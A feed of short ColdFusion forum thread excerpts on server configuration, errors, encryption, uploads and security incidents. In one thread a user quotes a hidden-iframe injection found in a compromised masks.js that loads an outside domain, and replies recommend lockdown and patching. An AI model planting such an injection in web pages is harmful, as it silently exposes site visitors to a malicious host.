Re: CF Builder
Are you looking to test your code? If yes, then you can enable the internal port of ColdFusion (server.xml: C:\ColdFusion10\cfusion\runtime\conf) and place the .cfm in the wwwroot of ColdFusion...
CF10 VFS Max Size Limit?
Is there a maximum amount of RAM that can be allocated to the virtual file system? When I specify more than 1 GB size, the system returns a negative number for the remaining free space, and any...
CF 10 errors show Error 500 instead of normal error message
Hi, Strangely, our CF 10 server has started to show "500 - Internal server error" whenever a CF error occurs, instead of the normal error message. The error is logged, but the front end shows the error...
MySQL aes_encrypt
Hi, I am using the MySQL aes_encrypt function for encrypting data in the database, i.e. a sample update query that I have: <cfquery name="updateUser" datasource="#application.datasource#">UPDATE...
Client Variable Showing Outdated Value Intermittently
We have a legacy ColdFusion application using 150 client variables to manage session state. The client variables are centrally stored in a SQL Server database within a 6 (CF9) application server...
Re: CF 10 errors show Error 500 instead of normal error message
Hello tribule, Thank you for your post. The error 500 is a generic error thrown by IIS. IIS received the request; however, an internal error occurred during the processing of the request. The root...
CFIDE/scripts/masks.js Compromised
We just found an injection at the end of masks.js. Here is the content that was added: "document.write("<iframe width='1' height='0' src='http://top12.oufm.info/'></iframe>");" Not sure what...
Re: pause, resume, and delete not working
So, it turns out if you use 'mode' or 'group' attributes, you must have them to pause, resume, and delete the task, even if you are referencing them by their name. Once I added 'mode' and 'group' it...
Re: CFIDE/scripts/masks.js Compromised
Hello XeeMe2, Thank you for your post. Have you followed the LockDown guide for blocking CFIDE requests? Here is the link: http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products...
Re: CFIDE/scripts/masks.js Compromised
There are various threads on this and similar CFIDE vulnerabilities. Make sure you are at the latest patch/hotfix level. Also for your web facing sites, I always recommend pointing your "cfide" virtual...
Re: CFIDE/scripts/masks.js Compromised
Thanks Anit, appreciate it. Yes, we saw it but felt it is not really helping as the CFIDE will need to be accessible virtually somehow. Also it looked like a huge act for just a little improvement....
upload from local or url, the most secure file extension check
In short, I want to allow users to upload images from a local computer or URL. So, what's the best approach to secure my application, more specifically to block all file extensions except those in white list....
Re: CFIDE/scripts/masks.js Compromised
Would making all of the /CFIDE folder have basic authentication, for example, stop such an attack?
Re: CFIDE/scripts/masks.js Compromised
Please refer to the Block /CFIDE requests section of the LockDown Guide (http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/91025512-cf9-lockdownguide-wp-ue.pdf)....
Re: upload from local or url, the most secure file extension check
Besides checking the file extension, you could add another layer of security by using IsImageFile(). It supports: JPEG, GIF, TIFF, PNG, BMP...
Re: CFIDE/scripts/masks.js Compromised
Anit, I've read the lockdown guide, but can you also please confirm that putting authentication on the CFIDE folder will also stop such attacks. Or, is this not a good idea? If not, why?
Getting browser / version from cgi.http_user_agent
Hi, I am successfully storing away into the database each individual's cgi.http_user_agent. What I want to do is chop out the browser/platform and version number from the string and display it in a...
Coldfusion 9 jnbridge\uninstaller.jar - backdoor.msil.p found
I ran Malwarebytes last night, and found my ColdFusion 9 shows jnbridge\uninstall\uninstaller.jar and uninstall\uninstaller.jar infected with backdoor.MSIL.p. Does anyone know, is this a false positive...
Re: Coldfusion 9 jnbridge\uninstaller.jar - backdoor.msil.p found
Seems to be a false positive. Just found this thread: http://forums.adobe.com/thread/1266507
Invalid CFML construct
This code executes on ColdFusion 10... However, why does it not execute on ColdFusion 8? The line in red is where it fails. <cfscript>if (IsDefined("FORM.fName") AND IsDefined("FORM.lName") AND...